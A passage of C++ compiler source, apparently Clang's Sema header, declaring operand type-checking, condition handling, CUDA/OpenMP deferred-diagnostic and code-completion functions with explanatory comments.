ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
bool IsCompAssign = false);
QualType CheckAdditionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, QualType* CompLHSTy = nullptr);
QualType CheckSubtractionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
QualType* CompLHSTy = nullptr);
QualType CheckShiftOperands( // C99 6.5.7
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, bool IsCompAssign = false);
void CheckPtrComparisonWithNullChar(ExprResult &E, ExprResult &NullE);
QualType CheckCompareOperands( // C99 6.5.8/9
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckBitwiseOperands( // C99 6.5.[10...12]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckLogicalOperands( // C99 6.5.[13,14]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
// CheckAssignmentOperands is used for both simple and compound assignment.
// For simple assignment, pass both expressions and a null converted type.
// For compound assignment, pass both expressions and the converted type.
QualType CheckAssignmentOperands( // C99 6.5.16.[1,2]
Expr *LHSExpr, ExprResult &RHS, SourceLocation Loc, QualType CompoundType);
ExprResult checkPseudoObjectIncDec(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opcode, Expr *Op);
ExprResult checkPseudoObjectAssignment(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opcode,
Expr *LHS, Expr *RHS);
ExprResult checkPseudoObjectRValue(Expr *E);
Expr *recreateSyntacticForm(PseudoObjectExpr *E);
QualType CheckConditionalOperands( // C99 6.5.15
ExprResult &Cond, ExprResult &LHS, ExprResult &RHS,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation QuestionLoc);
QualType CXXCheckConditionalOperands( // C++ 5.16
ExprResult &cond, ExprResult &lhs, ExprResult &rhs,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation questionLoc);
QualType CheckGNUVectorConditionalTypes(ExprResult &Cond, ExprResult &LHS,
ExprResult &RHS,
SourceLocation QuestionLoc);
QualType FindCompositePointerType(SourceLocation Loc, Expr *&E1, Expr *&E2,
bool ConvertArgs = true);
QualType FindCompositePointerType(SourceLocation Loc,
ExprResult &E1, ExprResult &E2,
bool ConvertArgs = true) {
Expr *E1Tmp = E1.get(), *E2Tmp = E2.get();
QualType Composite =
FindCompositePointerType(Loc, E1Tmp, E2Tmp, ConvertArgs);
E1 = E1Tmp;
E2 = E2Tmp;
return Composite;
}
QualType FindCompositeObjCPointerType(ExprResult &LHS, ExprResult &RHS,
SourceLocation QuestionLoc);
bool DiagnoseConditionalForNull(Expr *LHSExpr, Expr *RHSExpr,
SourceLocation QuestionLoc);
void DiagnoseAlwaysNonNullPointer(Expr *E,
Expr::NullPointerConstantKind NullType,
bool IsEqual, SourceRange Range);
/// type checking for vector binary operators.
QualType CheckVectorOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, bool IsCompAssign,
bool AllowBothBool, bool AllowBoolConversion);
QualType GetSignedVectorType(QualType V);
QualType CheckVectorCompareOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckVectorLogicalOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc);
bool areLaxCompatibleVectorTypes(QualType srcType, QualType destType);
bool isLaxVectorConversion(QualType srcType, QualType destType);
/// type checking declaration initializers (C99 6.7.8)
bool CheckForConstantInitializer(Expr *e, QualType t);
// type checking C++ declaration initializers (C++ [dcl.init]).
/// ReferenceCompareResult - Expresses the result of comparing two
/// types (cv1 T1 and cv2 T2) to determine their compatibility for the
/// purposes of initialization by reference (C++ [dcl.init.ref]p4).
enum ReferenceCompareResult {
/// Ref_Incompatible - The two types are incompatible, so direct
/// reference binding is not possible.
Ref_Incompatible = 0,
/// Ref_Related - The two types are reference-related, which means
/// that their unqualified forms (T1 and T2) are either the same
/// or T1 is a base class of T2.
Ref_Related,
/// Ref_Compatible - The two types are reference-compatible.
Ref_Compatible
};
// Fake up a scoped enumeration that still contextually converts to bool.
struct ReferenceConversionsScope {
/// The conversions that would be performed on an lvalue of type T2 when
/// binding a reference of type T1 to it, as determined when evaluating
/// whether T1 is reference-compatible with T2.
enum ReferenceConversions {
Qualification = 0x1,
NestedQualification = 0x2,
Function = 0x4,
DerivedToBase = 0x8,
ObjC = 0x10,
ObjCLifetime = 0x20,
LLVM_MARK_AS_BITMASK_ENUM(/*LargestValue=*/ObjCLifetime)
};
};
using ReferenceConversions = ReferenceConversionsScope::ReferenceConversions;
ReferenceCompareResult
CompareReferenceRelationship(SourceLocation Loc, QualType T1, QualType T2,
ReferenceConversions *Conv = nullptr);
ExprResult checkUnknownAnyCast(SourceRange TypeRange, QualType CastType,
Expr *CastExpr, CastKind &CastKind,
ExprValueKind &VK, CXXCastPath &Path);
/// Force an expression with unknown-type to an expression of the
/// given type.
ExprResult forceUnknownAnyToType(Expr *E, QualType ToType);
/// Type-check an expression that's being passed to an
/// __unknown_anytype parameter.
ExprResult checkUnknownAnyArg(SourceLocation callLoc,
Expr *result, QualType ¶mType);
// CheckVectorCast - check type constraints for vectors.
// Since vectors are an extension, there are no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size.
// returns true if the cast is invalid
bool CheckVectorCast(SourceRange R, QualType VectorTy, QualType Ty,
CastKind &Kind);
/// Prepare `SplattedExpr` for a vector splat operation, adding
/// implicit casts if necessary.
ExprResult prepareVectorSplat(QualType VectorTy, Expr *SplattedExpr);
// CheckExtVectorCast - check type constraints for extended vectors.
// Since vectors are an extension, there are no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size,
// or vectors and the element type of that vector.
// returns the cast expr
ExprResult CheckExtVectorCast(SourceRange R, QualType DestTy, Expr *CastExpr,
CastKind &Kind);
ExprResult BuildCXXFunctionalCastExpr(TypeSourceInfo *TInfo, QualType Type,
SourceLocation LParenLoc,
Expr *CastExpr,
SourceLocation RParenLoc);
enum ARCConversionResult { ACR_okay, ACR_unbridged, ACR_error };
/// Checks for invalid conversions and casts between
/// retainable pointers and other pointer kinds for ARC and Weak.
ARCConversionResult CheckObjCConversion(SourceRange castRange,
QualType castType, Expr *&op,
CheckedConversionKind CCK,
bool Diagnose = true,
bool DiagnoseCFAudited = false,
BinaryOperatorKind Opc = BO_PtrMemD
);
Expr *stripARCUnbridgedCast(Expr *e);
void diagnoseARCUnbridgedCast(Expr *e);
bool CheckObjCARCUnavailableWeakConversion(QualType castType,
QualType ExprType);
/// checkRetainCycles - Check whether an Objective-C message send
/// might create an obvious retain cycle.
void checkRetainCycles(ObjCMessageExpr *msg);
void checkRetainCycles(Expr *receiver, Expr *argument);
void checkRetainCycles(VarDecl *Var, Expr *Init);
/// checkUnsafeAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained type.
bool checkUnsafeAssigns(SourceLocation Loc, QualType LHS, Expr *RHS);
/// checkUnsafeExprAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained expression.
void checkUnsafeExprAssigns(SourceLocation Loc, Expr *LHS, Expr *RHS);
/// CheckMessageArgumentTypes - Check types in an Obj-C message send.
/// \param Method - May be null.
/// \param [out] ReturnType - The return type of the send.
/// \return true iff there were any incompatible types.
bool CheckMessageArgumentTypes(const Expr *Receiver, QualType ReceiverType,
MultiExprArg Args, Selector Sel,
ArrayRef<SourceLocation> SelectorLocs,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage, SourceLocation lbrac,
SourceLocation rbrac, SourceRange RecRange,
QualType &ReturnType, ExprValueKind &VK);
/// Determine the result of a message send expression based on
/// the type of the receiver, the method expected to receive the message,
/// and the form of the message send.
QualType getMessageSendResultType(const Expr *Receiver, QualType ReceiverType,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage);
/// If the given expression involves a message send to a method
/// with a related result type, emit a note describing what happened.
void EmitRelatedResultTypeNote(const Expr *E);
/// Given that we had incompatible pointer types in a return
/// statement, check whether we're in a method with a related result
/// type, and if so, emit a note describing what happened.
void EmitRelatedResultTypeNoteForReturn(QualType destType);
class ConditionResult {
Decl *ConditionVar;
FullExprArg Condition;
bool Invalid;
bool HasKnownValue;
bool KnownValue;
friend class Sema;
ConditionResult(Sema &S, Decl *ConditionVar, FullExprArg Condition,
bool IsConstexpr)
: ConditionVar(ConditionVar), Condition(Condition), Invalid(false),
HasKnownValue(IsConstexpr && Condition.get() &&
!Condition.get()->isValueDependent()),
KnownValue(HasKnownValue &&
!!Condition.get()->EvaluateKnownConstInt(S.Context)) {}
explicit ConditionResult(bool Invalid)
: ConditionVar(nullptr), Condition(nullptr), Invalid(Invalid),
HasKnownValue(false), KnownValue(false) {}
public:
ConditionResult() : ConditionResult(false) {}
bool isInvalid() const { return Invalid; }
std::pair<VarDecl *, Expr *> get() const {
return std::make_pair(cast_or_null<VarDecl>(ConditionVar),
Condition.get());
}
llvm::Optional<bool> getKnownValue() const {
if (!HasKnownValue)
return None;
return KnownValue;
}
};
static ConditionResult ConditionError() { return ConditionResult(true); }
enum class ConditionKind {
Boolean, ///< A boolean condition, from 'if', 'while', 'for', or 'do'.
ConstexprIf, ///< A constant boolean condition from 'if constexpr'.
Switch ///< An integral condition for a 'switch' statement.
};
ConditionResult ActOnCondition(Scope *S, SourceLocation Loc,
Expr *SubExpr, ConditionKind CK);
ConditionResult ActOnConditionVariable(Decl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
DeclResult ActOnCXXConditionDeclaration(Scope *S, Declarator &D);
ExprResult CheckConditionVariable(VarDecl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
ExprResult CheckSwitchCondition(SourceLocation SwitchLoc, Expr *Cond);
/// CheckBooleanCondition - Diagnose problems involving the use of
/// the given expression as a boolean condition (e.g. in an if
/// statement). Also performs the standard function and array
/// decays, possibly changing the input variable.
///
/// \param Loc - A location associated with the condition, e.g. the
/// 'if' keyword.
/// \return true iff there were any errors
ExprResult CheckBooleanCondition(SourceLocation Loc, Expr *E,
bool IsConstexpr = false);
/// ActOnExplicitBoolSpecifier - Build an ExplicitSpecifier from an expression
/// found in an explicit(bool) specifier.
ExplicitSpecifier ActOnExplicitBoolSpecifier(Expr *E);
/// tryResolveExplicitSpecifier - Attempt to resolve the explict specifier.
/// Returns true if the explicit specifier is now resolved.
bool tryResolveExplicitSpecifier(ExplicitSpecifier &ExplicitSpec);
/// DiagnoseAssignmentAsCondition - Given that an expression is
/// being used as a boolean condition, warn if it's an assignment.
void DiagnoseAssignmentAsCondition(Expr *E);
/// Redundant parentheses over an equality comparison can indicate
/// that the user intended an assignment used as condition.
void DiagnoseEqualityWithExtraParens(ParenExpr *ParenE);
/// CheckCXXBooleanCondition - Returns true if conversion to bool is invalid.
ExprResult CheckCXXBooleanCondition(Expr *CondExpr, bool IsConstexpr = false);
/// ConvertIntegerToTypeWarnOnOverflow - Convert the specified APInt to have
/// the specified width and sign. If an overflow occurs, detect it and emit
/// the specified diagnostic.
void ConvertIntegerToTypeWarnOnOverflow(llvm::APSInt &OldVal,
unsigned NewWidth, bool NewSign,
SourceLocation Loc, unsigned DiagID);
/// Checks that the Objective-C declaration is declared in the global scope.
/// Emits an error and marks the declaration as invalid if it's not declared
/// in the global scope.
bool CheckObjCDeclScope(Decl *D);
/// Abstract base class used for diagnosing integer constant
/// expression violations.
class VerifyICEDiagnoser {
public:
bool Suppress;
VerifyICEDiagnoser(bool Suppress = false) : Suppress(Suppress) { }
virtual void diagnoseNotICE(Sema &S, SourceLocation Loc, SourceRange SR) =0;
virtual void diagnoseFold(Sema &S, SourceLocation Loc, SourceRange SR);
virtual ~VerifyICEDiagnoser() { }
};
/// VerifyIntegerConstantExpression - Verifies that an expression is an ICE,
/// and reports the appropriate diagnostics. Returns false on success.
/// Can optionally return the value of the expression.
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
VerifyICEDiagnoser &Diagnoser,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
unsigned DiagID,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E,
llvm::APSInt *Result = nullptr);
/// VerifyBitField - verifies that a bit field expression is an ICE and has
/// the correct width, and that the field type is valid.
/// Returns false on success.
/// Can optionally return whether the bit-field is of width 0
ExprResult VerifyBitField(SourceLocation FieldLoc, IdentifierInfo *FieldName,
QualType FieldTy, bool IsMsStruct,
Expr *BitWidth, bool *ZeroWidth = nullptr);
private:
unsigned ForceCUDAHostDeviceDepth = 0;
public:
/// Increments our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. So long as this count is greater
/// than zero, all functions encountered will be __host__ __device__.
void PushForceCUDAHostDevice();
/// Decrements our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. Returns false if the count is 0
/// before incrementing, so you can emit an error.
bool PopForceCUDAHostDevice();
/// Diagnostics that are emitted only if we discover that the given function
/// must be codegen'ed. Because handling these correctly adds overhead to
/// compilation, this is currently only enabled for CUDA compilations.
llvm::DenseMap<CanonicalDeclPtr<FunctionDecl>,
std::vector<PartialDiagnosticAt>>
DeviceDeferredDiags;
/// A pair of a canonical FunctionDecl and a SourceLocation. When used as the
/// key in a hashtable, both the FD and location are hashed.
struct FunctionDeclAndLoc {
CanonicalDeclPtr<FunctionDecl> FD;
SourceLocation Loc;
};
/// FunctionDecls and SourceLocations for which CheckCUDACall has emitted a
/// (maybe deferred) "bad call" diagnostic. We use this to avoid emitting the
/// same deferred diag twice.
llvm::DenseSet<FunctionDeclAndLoc> LocsWithCUDACallDiags;
/// An inverse call graph, mapping known-emitted functions to one of their
/// known-emitted callers (plus the location of the call).
///
/// Functions that we can tell a priori must be emitted aren't added to this
/// map.
llvm::DenseMap</* Callee = */ CanonicalDeclPtr<FunctionDecl>,
/* Caller = */ FunctionDeclAndLoc>
DeviceKnownEmittedFns;
/// Diagnostic builder for CUDA/OpenMP devices errors which may or may not be
/// deferred.
///
/// In CUDA, there exist constructs (e.g. variable-length arrays, try/catch)
/// which are not allowed to appear inside __device__ functions and are
/// allowed to appear in __host__ __device__ functions only if the host+device
/// function is never codegen'ed.
///
/// To handle this, we use the notion of "deferred diagnostics", where we
/// attach a diagnostic to a FunctionDecl that's emitted iff it's codegen'ed.
///
/// This class lets you emit either a regular diagnostic, a deferred
/// diagnostic, or no diagnostic at all, according to an argument you pass to
/// its constructor, thus simplifying the process of creating these "maybe
/// deferred" diagnostics.
class DeviceDiagBuilder {
public:
enum Kind {
/// Emit no diagnostics.
K_Nop,
/// Emit the diagnostic immediately (i.e., behave like Sema::Diag()).
K_Immediate,
/// Emit the diagnostic immediately, and, if it's a warning or error, also
/// emit a call stack showing how this function can be reached by an a
/// priori known-emitted function.
K_ImmediateWithCallStack,
/// Create a deferred diagnostic, which is emitted only if the function
/// it's attached to is codegen'ed. Also emit a call stack as with
/// K_ImmediateWithCallStack.
K_Deferred
};
DeviceDiagBuilder(Kind K, SourceLocation Loc, unsigned DiagID,
FunctionDecl *Fn, Sema &S);
DeviceDiagBuilder(DeviceDiagBuilder &&D);
DeviceDiagBuilder(const DeviceDiagBuilder &) = default;
~DeviceDiagBuilder();
/// Convertible to bool: True if we immediately emitted an error, false if
/// we didn't emit an error or we created a deferred error.
///
/// Example usage:
///
/// if (DeviceDiagBuilder(...) << foo << bar)
/// return ExprError();
///
/// But see CUDADiagIfDeviceCode() and CUDADiagIfHostCode() -- you probably
/// want to use these instead of creating a DeviceDiagBuilder yourself.
operator bool() const { return ImmediateDiag.hasValue(); }
template <typename T>
friend const DeviceDiagBuilder &operator<<(const DeviceDiagBuilder &Diag,
const T &Value) {
if (Diag.ImmediateDiag.hasValue())
*Diag.ImmediateDiag << Value;
else if (Diag.PartialDiagId.hasValue())
Diag.S.DeviceDeferredDiags[Diag.Fn][*Diag.PartialDiagId].second
<< Value;
return Diag;
}
private:
Sema &S;
SourceLocation Loc;
unsigned DiagID;
FunctionDecl *Fn;
bool ShowCallStack;
// Invariant: At most one of these Optionals has a value.
// FIXME: Switch these to a Variant once that exists.
llvm::Optional<SemaDiagnosticBuilder> ImmediateDiag;
llvm::Optional<unsigned> PartialDiagId;
};
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as device code".
///
/// - If CurContext is a __host__ function, does not emit any diagnostics.
/// - If CurContext is a __device__ or __global__ function, emits the
/// diagnostics immediately.
/// - If CurContext is a __host__ __device__ function and we are compiling for
/// the device, creates a diagnostic which is emitted if and when we realize
/// that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in CUDA device code.
/// if (CUDADiagIfDeviceCode(Loc, diag::err_cuda_vla) << CurrentCUDATarget())
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder CUDADiagIfDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as host code".
///
/// Same as CUDADiagIfDeviceCode, with "host" and "device" switched.
DeviceDiagBuilder CUDADiagIfHostCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as device code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the device, emits the diagnostics immediately.
/// - If CurContext is a non-`declare target` function and we are compiling
/// for the device, creates a diagnostic which is emitted if and when we
/// realize that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPDeviceCode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as host code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the host, emits the diagnostics immediately.
/// - If CurContext is a non-host function, just ignore it.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPHostode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPHostCode(SourceLocation Loc, unsigned DiagID);
DeviceDiagBuilder targetDiag(SourceLocation Loc, unsigned DiagID);
enum CUDAFunctionTarget {
CFT_Device,
CFT_Global,
CFT_Host,
CFT_HostDevice,
CFT_InvalidTarget
};
/// Determines whether the given function is a CUDA device/host/kernel/etc.
/// function.
///
/// Use this rather than examining the function's attributes yourself -- you
/// will get it wrong. Returns CFT_Host if D is null.
CUDAFunctionTarget IdentifyCUDATarget(const FunctionDecl *D,
bool IgnoreImplicitHDAttr = false);
CUDAFunctionTarget IdentifyCUDATarget(const ParsedAttributesView &Attrs);
/// Gets the CUDA target for the current context.
CUDAFunctionTarget CurrentCUDATarget() {
return IdentifyCUDATarget(dyn_cast<FunctionDecl>(CurContext));
}
static bool IsCUDAImplicitHostDeviceFunction(const FunctionDecl *D);
// CUDA function call preference. Must be ordered numerically from
// worst to best.
enum CUDAFunctionPreference {
CFP_Never, // Invalid caller/callee combination.
CFP_WrongSide, // Calls from host-device to host or device
// function that do not match current compilation
// mode.
CFP_HostDevice, // Any calls to host/device functions.
CFP_SameSide, // Calls from host-device to host or device
// function matching current compilation mode.
CFP_Native, // host-to-host or device-to-device calls.
};
/// Identifies relative preference of a given Caller/Callee
/// combination, based on their host/device attributes.
/// \param Caller function which needs address of \p Callee.
/// nullptr in case of global context.
/// \param Callee target function
///
/// \returns preference value for particular Caller/Callee combination.
CUDAFunctionPreference IdentifyCUDAPreference(const FunctionDecl *Caller,
const FunctionDecl *Callee);
/// Determines whether Caller may invoke Callee, based on their CUDA
/// host/device attributes. Returns false if the call is not allowed.
///
/// Note: Will return true for CFP_WrongSide calls. These may appear in
/// semantically correct CUDA programs, but only if they're never codegen'ed.
bool IsAllowedCUDACall(const FunctionDecl *Caller,
const FunctionDecl *Callee) {
return IdentifyCUDAPreference(Caller, Callee) != CFP_Never;
}
/// May add implicit CUDAHostAttr and CUDADeviceAttr attributes to FD,
/// depending on FD and the current compilation settings.
void maybeAddCUDAHostDeviceAttrs(FunctionDecl *FD,
const LookupResult &Previous);
public:
/// Check whether we're allowed to call Callee from the current context.
///
/// - If the call is never allowed in a semantically-correct program
/// (CFP_Never), emits an error and returns false.
///
/// - If the call is allowed in semantically-correct programs, but only if
/// it's never codegen'ed (CFP_WrongSide), creates a deferred diagnostic to
/// be emitted if and when the caller is codegen'ed, and returns true.
///
/// Will only create deferred diagnostics for a given SourceLocation once,
/// so you can safely call this multiple times without generating duplicate
/// deferred errors.
///
/// - Otherwise, returns true without emitting any diagnostics.
bool CheckCUDACall(SourceLocation Loc, FunctionDecl *Callee);
/// Set __device__ or __host__ __device__ attributes on the given lambda
/// operator() method.
///
/// CUDA lambdas declared inside __device__ or __global__ functions inherit
/// the __device__ attribute. Similarly, lambdas inside __host__ __device__
/// functions become __host__ __device__ themselves.
void CUDASetLambdaAttrs(CXXMethodDecl *Method);
/// Finds a function in \p Matches with highest calling priority
/// from \p Caller context and erases all functions with lower
/// calling priority.
void EraseUnwantedCUDAMatches(
const FunctionDecl *Caller,
SmallVectorImpl<std::pair<DeclAccessPair, FunctionDecl *>> &Matches);
/// Given a implicit special member, infer its CUDA target from the
/// calls it needs to make to underlying base/field special members.
/// \param ClassDecl the class for which the member is being created.
/// \param CSM the kind of special member.
/// \param MemberDecl the special member itself.
/// \param ConstRHS true if this is a copy operation with a const object on
/// its RHS.
/// \param Diagnose true if this call should emit diagnostics.
/// \return true if there was an error inferring.
/// The result of this call is implicit CUDA target attribute(s) attached to
/// the member declaration.
bool inferCUDATargetForImplicitSpecialMember(CXXRecordDecl *ClassDecl,
CXXSpecialMember CSM,
CXXMethodDecl *MemberDecl,
bool ConstRHS,
bool Diagnose);
/// \return true if \p CD can be considered empty according to CUDA
/// (E.2.3.1 in CUDA 7.5 Programming guide).
bool isEmptyCudaConstructor(SourceLocation Loc, CXXConstructorDecl *CD);
bool isEmptyCudaDestructor(SourceLocation Loc, CXXDestructorDecl *CD);
// \brief Checks that initializers of \p Var satisfy CUDA restrictions. In
// case of error emits appropriate diagnostic and invalidates \p Var.
//
// \details CUDA allows only empty constructors as initializers for global
// variables (see E.2.3.1, CUDA 7.5). The same restriction also applies to all
// __shared__ variables whether they are local or not (they all are implicitly
// static in CUDA). One exception is that CUDA allows constant initializers
// for __constant__ and __device__ variables.
void checkAllowedCUDAInitializer(VarDecl *VD);
/// Check whether NewFD is a valid overload for CUDA. Emits
/// diagnostics and invalidates NewFD if not.
void checkCUDATargetOverload(FunctionDecl *NewFD,
const LookupResult &Previous);
/// Copies target attributes from the template TD to the function FD.
void inheritCUDATargetAttrs(FunctionDecl *FD, const FunctionTemplateDecl &TD);
/// Returns the name of the launch configuration function. This is the name
/// of the function that will be called to configure kernel call, with the
/// parameters specified via <<<>>>.
std::string getCudaConfigureFuncName() const;
/// \name Code completion
//@{
/// Describes the context in which code completion occurs.
enum ParserCompletionContext {
/// Code completion occurs at top-level or namespace context.
PCC_Namespace,
/// Code completion occurs within a class, struct, or union.
PCC_Class,
/// Code completion occurs within an Objective-C interface, protocol,
/// or category.
PCC_ObjCInterface,
/// Code completion occurs within an Objective-C implementation or
/// category implementation
PCC_ObjCImplementation,
/// Code completion occurs within the list of instance variables
/// in an Objective-C interface, protocol, category, or implementation.
PCC_ObjCInstanceVariableList,
/// Code completion occurs following one or more template
/// headers.
PCC_Template,
/// Code completion occurs following one or more template
/// headers within a class.
PCC_MemberTemplate,
/// Code completion occurs within an expression.
PCC_Expression,
/// Code completion occurs within a statement, which may
/// also be an expression or a declaration.
PCC_Statement,
/// Code completion occurs at the beginning of the
/// initialization statement (or expression) in a for loop.
PCC_ForInit,
/// Code completion occurs within the condition of an if,
/// while, switch, or for statement.
PCC_Condition,
/// Code completion occurs within the body of a function on a
/// recovery path, where we do not have a specific handle on our position
/// in the grammar.
PCC_RecoveryInFunction,
/// Code completion occurs where only a type is permitted.
PCC_Type,
/// Code completion occurs in a parenthesized expression, which
/// might also be a type cast.
PCC_ParenthesizedExpression,
/// Code completion occurs within a sequence of declaration
/// specifiers within a function, method, or block.
PCC_LocalDeclarationSpecifiers
};
void CodeCompleteModuleImport(SourceLocation ImportLoc, ModuleIdPath Path);
void CodeCompleteOrdinaryName(Scope *S,
ParserCompletionContext CompletionContext);
void CodeCompleteDeclSpec(Scope *S, DeclSpec &DS,
bool AllowNonIdentifiers,
bool AllowNestedNameSpecifiers);
struct CodeCompleteExpressionData;
void CodeCompleteExpression(Scope *S,
const CodeCompleteExpressionData &Data);
void CodeCompleteExpression(Scope *S, QualType PreferredType,
bool IsParenthesized = false);
void CodeCompleteMemberReferenceExpr(Scope *S, Expr *Base, Expr *OtherOpBase,
SourceLocation OpLoc, bool IsArrow,
bool IsBaseExprStatement,
QualType PreferredType);
void CodeCompletePostfixExpression(Scope *S, ExprResult LHS,
QualType PreferredType);
void CodeCompleteTag(Scope *S, unsigned TagSpec);
void CodeCompleteTypeQualifiers(DeclSpec &DS);
void CodeCompleteFunctionQualifiers(DeclSpec &DS, Declarator &D,
const VirtSpecifiers *VS = nullptr);
void CodeCompleteBracketDeclarator(Scope *S);
void CodeCompleteCase(Scope *S);
/// Reports signatures for a call to CodeCompleteConsumer and returns the
/// preferred type for the current argument. Returned type can be null.
QualType ProduceCallSignatureHelp(Scope *S, Expr *Fn, ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceConstructorSignatureHelp(Scope *S, QualType Type,
SourceLocation Loc,
ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceCtorInitMemberSignatureHelp(Scope *S, Decl *ConstructorDecl,
CXXScopeSpec SS,
ParsedType TemplateTypeTy,
ArrayRef<Expr *> ArgExprs,
IdentifierInfo *II,
SourceLocation OpenParLoc);
void CodeCompleteInitializer(Scope *S, Decl *D);
/// Trigger code completion for a record of \p BaseType. \p InitExprs are
/// expressions in the initializer list seen so far and \p D is the current
/// Designation being parsed.
void CodeCompleteDesignator(const QualType BaseType,
llvm::ArrayRef<Expr *> InitExprs,
const Designation &D);
void CodeCompleteAfterIf(Scope *S);
void CodeCompleteQualifiedId(Scope *S, CXXScopeSpec &SS, bool EnteringContext,
bool IsUsingDeclaration, QualType BaseType,
QualType PreferredType);
void CodeCompleteUsing(Scope *S);
void CodeCompleteUsingDirective(Scope *S);
void CodeCompleteNamespaceDecl(Scope *S);
void CodeCompleteNamespaceAliasDecl(Scope *S);
void CodeCompleteOperatorName(Scope *S);
void CodeCompleteConstructorInitializer(
Decl *Constructor,
ArrayRef<CXXCtorInitializer *> Initializers);
void CodeCompleteLambdaIntroducer(Scope *S, LambdaIntroducer &Intro,
bool AfterAmpersand);
void CodeCompleteObjCAtDirective(Scope *S);
void CodeCompleteObjCAtVisibility(Scope *S);
void CodeCompleteObjCAtStatement(Scope *S);
void CodeCompleteObjCAtExpression(Scope *S);
void CodeCompleteObjCPropertyFlags(Scope *S, ObjCDeclSpec &ODS);
void CodeCompleteObjCPropertyGetter(Scope *S);
void CodeCompleteObjCPropertySetter(Scope *S);
void CodeCompleteObjCPassingType(Scope *S, ObjCDeclSpec &DS,
bool IsParameter);
void CodeCompleteObjCMessageReceiver(Scope *S);
void CodeCompleteObjCSuperMessage(Scope *S, SourceLocation SuperLoc,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression);
void CodeCompleteObjCClassMessage(Scope *S, ParsedType Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
bool IsSuper = false);
void CodeCompleteObjCInstanceMessage(Scope *S, Expr *Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
ObjCInterfaceDecl *Super = nullptr);
void CodeCompleteObjCForCollection(Scope *S,
DeclGroupPtrTy IterationVar);
void CodeCompleteObjCSelector(Scope *S,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCProtocolReferences(
ArrayRef<IdentifierLocPair> Protocols);
void CodeCompleteObjCProtocolDecl(Scope *S);
void CodeCompleteObjCInterfaceDecl(Scope *S);
void CodeCompleteObjCSuperclass(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationDecl(Scope *S);
void CodeCompleteObjCInterfaceCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCPropertyDefinition(Scope *S);
void CodeCompleteObjCPropertySynthesizeIvar(Scope *S,
IdentifierInfo *PropertyName);
void CodeCompleteObjCMethodDecl(Scope *S, Optional<bool> IsInstanceMethod,
ParsedType ReturnType);
void CodeCompleteObjCMethodDeclSelector(Scope *S,
bool IsInstanceMethod,
bool AtParameterName,
ParsedType ReturnType,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCClassPropertyRefExpr(Scope *S, IdentifierInfo &ClassName,
SourceLocation ClassNameLoc,
bool IsBaseExprStatement);
void CodeCompletePreprocessorDirective(bool InConditional);
void CodeCompleteInPreprocessorConditionalExclusion(Scope *S);
void CodeCompletePreprocessorMacroName(bool IsDefinition);
void CodeCompletePreprocessorExpression();
void CodeCompletePreprocessorMacroArgument(Scope *S,
IdentifierInfo *Macro,
MacroInfo *MacroInfo,
unsigned Argument);
